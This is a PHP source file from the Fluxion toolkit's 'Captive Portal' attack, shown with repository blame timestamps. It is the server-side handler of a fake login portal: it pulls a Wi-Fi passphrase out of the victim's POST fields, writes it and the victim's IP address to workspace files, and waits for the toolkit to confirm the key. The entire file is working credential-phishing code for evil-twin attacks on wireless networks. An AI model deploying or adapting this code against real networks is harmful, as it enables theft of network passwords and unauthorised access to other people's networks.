fluxion/attacks/Captive Portal/lib/authenticator.php

77 lines
2.6 KiB
PHP
Raw Normal View History

2018-08-03 12:56:15 -06:00
<?php
2019-05-26 20:38:00 -06:00
error_reporting(0);
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
// Store get & post data to variables.
$candidate_key_fields = array(
"password",
"password1",
"passphrase",
"key",
"key1",
"wpa",
"wpa_psw");
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
// Get array of keys matching any in $candidate_key_fields.
$candidate_key_fields_matches = array_intersect_key($_POST, array_flip($candidate_key_fields));
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
// Retrieve just the first matched value.
$candidate_key = reset($candidate_key_fields_matches);
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
// The following varible represents the authenticator result.
// By default, we assume the password is incorrect (value 0).
// WARNING: The variable below is used by external scripts.
// That means it MUST be defined before exiting returning.
$candidate_key_result = 0;
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
// Attempt verification only if a key exists.
if(!empty($candidate_key))
{
// Increment hit attempts.
$page_hits_log_path = ("$FLUXIONWorkspacePath/hit.txt");
$page_hits = file($page_hits_log_path)[0] + 1;
$page_hits_log = fopen($page_hits_log_path, "w");
fputs($page_hits_log, $page_hits);
fclose($page_hits_log);
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
// Prepare candidate, and attempt, passwords files' locations.
// Notice: The values in the strings below will be substituted
// by the script once the autheticator script is deployed.
$attempt_log_path = "$FLUXIONWorkspacePath/pwdattempt.txt";
$candidate_key_path = "$FLUXIONWorkspacePath/candidate.txt";
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
$attempt_log_file = fopen($attempt_log_path, "w");
fwrite($attempt_log_file, $candidate_key);
fwrite($attempt_log_file, "\n");
fclose($attempt_log_file);
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
// Write candidate key to file to prep for checking.
$candidate_key_file = fopen($candidate_key_path, "w");
fwrite($candidate_key_file, $candidate_key);
fwrite($candidate_key_file, "\n");
fclose($candidate_key_file);
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
// Prepare clients IP log path, and client IP.
$clients_IP_log_path = "/tmp/fluxspace/ip_hits";
$client_IP = $_SERVER['REMOTE_ADDR'];
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
// Write client IP to log file.
$clients_IP_file = fopen($clients_IP_log_path, "w");
fwrite($clients_IP_file, $client_IP);
fclose($clients_IP_file);
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
$candidate_key_result_path = "$FLUXIONWorkspacePath/candidate_result.txt";
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
// Create candidate result file to trigger checking.
$candidate_key_result_file = fopen($candidate_key_result_path, "w");
fwrite($candidate_key_result_file,"\n");
fclose($candidate_key_result_file);
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
do {
sleep(1);
$candidate_key_result = trim(file_get_contents($candidate_key_result_path));
} while (!ctype_digit($candidate_key_result));
2018-08-03 12:56:15 -06:00
2019-05-26 20:38:00 -06:00
// Reset file by deleting it.
unlink($candidate_key_result_path);
}